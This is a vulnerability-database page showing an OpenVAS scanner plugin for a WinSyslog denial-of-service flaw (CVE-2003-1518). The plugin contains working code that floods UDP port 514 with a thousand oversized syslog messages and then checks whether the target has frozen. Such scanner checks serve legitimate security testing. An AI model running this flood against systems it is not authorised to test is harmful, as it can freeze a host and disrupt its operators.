WinSyslog (DoS)
🗓️ 03 Nov 2005 00:00:00Reported by Copyright (C) 2003 Matthew NorthType
openvas🔗 plugins.openvas.org👁 25 Views
| Reporter | Title | Published | Views | Family All 6 |
|---|---|---|---|---|
| CVE-2003-1518 | 25 Oct 200719:00 | – | cve | |
| CVE-2003-1518 | 25 Oct 200719:00 | – | cvelist | |
| WinSyslog Interactive Syslog Server 4.21 - long Message Remote Denial of Service | 14 Oct 200300:00 | – | exploitdb | |
| EUVD-2003-1508 | 7 Oct 202500:30 | – | euvd | |
| CVE-2003-1518 | 31 Dec 200305:00 | – | nvd | |
| WinSyslog Long Syslog Message Remote DoS | 15 Oct 200300:00 | – | nessus |
| Source | Link |
|---|---|
| securityfocus | www.securityfocus.com/bid/8821 |
# SPDX-FileCopyrightText: 2003 Matthew North
# Some text descriptions might be excerpted from (a) referenced
# source(s), and are Copyright (C) by the respective right holder(s).
#
# SPDX-License-Identifier: GPL-2.0-only
if(description)
{
script_oid("1.3.6.1.4.1.25623.1.0.11884");
script_version("2023-08-03T05:05:16+0000");
script_tag(name:"last_modification", value:"2023-08-03 05:05:16 +0000 (Thu, 03 Aug 2023)");
script_tag(name:"creation_date", value:"2005-11-03 14:08:04 +0100 (Thu, 03 Nov 2005)");
script_tag(name:"cvss_base", value:"7.8");
script_tag(name:"cvss_base_vector", value:"AV:N/AC:L/Au:N/C:N/I:N/A:C");
script_cve_id("CVE-2003-1518");
script_xref(name:"URL", value:"http://www.securityfocus.com/bid/8821");
script_name("WinSyslog (DoS)");
script_category(ACT_DENIAL); # ACT_FLOOD?
script_copyright("Copyright (C) 2003 Matthew North");
script_family("Denial of Service");
script_dependencies("os_detection.nasl");
script_require_udp_ports(514);
script_mandatory_keys("Host/runs_windows");
script_tag(name:"affected", value:"WinSyslog Version 4.21 SP1.");
script_tag(name:"solution", value:"Contact the vendor for an update.");
script_tag(name:"summary", value:"A vulnerability in WinSyslog allows remote attackers
to cause the WinSyslog to freeze, which in turn will also freeze the operating system
on which the product executes.");
script_tag(name:"solution_type", value:"VendorFix");
script_tag(name:"qod_type", value:"remote_probe");
exit(0);
}
include("host_details.inc");
start_denial();
sleep( 1);
up = end_denial();
if(!up)
exit(0);
port = 514;
if( ! get_udp_port_state( port ) )
exit( 0 );
soc = open_sock_udp( port );
if( ! soc )
exit( 0 );
start_denial();
for( i = 0; i < 1000; i++ ) {
num = (600+i)*4;
bufc = string( crap( num ) );
buf = string("<00>", bufc);
send( socket:soc, data:buf );
}
close( soc );
sleep( 5 );
alive = end_denial();
if( ! alive ) {
security_message( port:port, proto:"udp" );
exit( 0 );
}
exit( 99 );
Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
03 Aug 2023 00:00Current
6.7Medium risk
Vulners AI Score6.7
CVSS 27.8
EPSS0.07224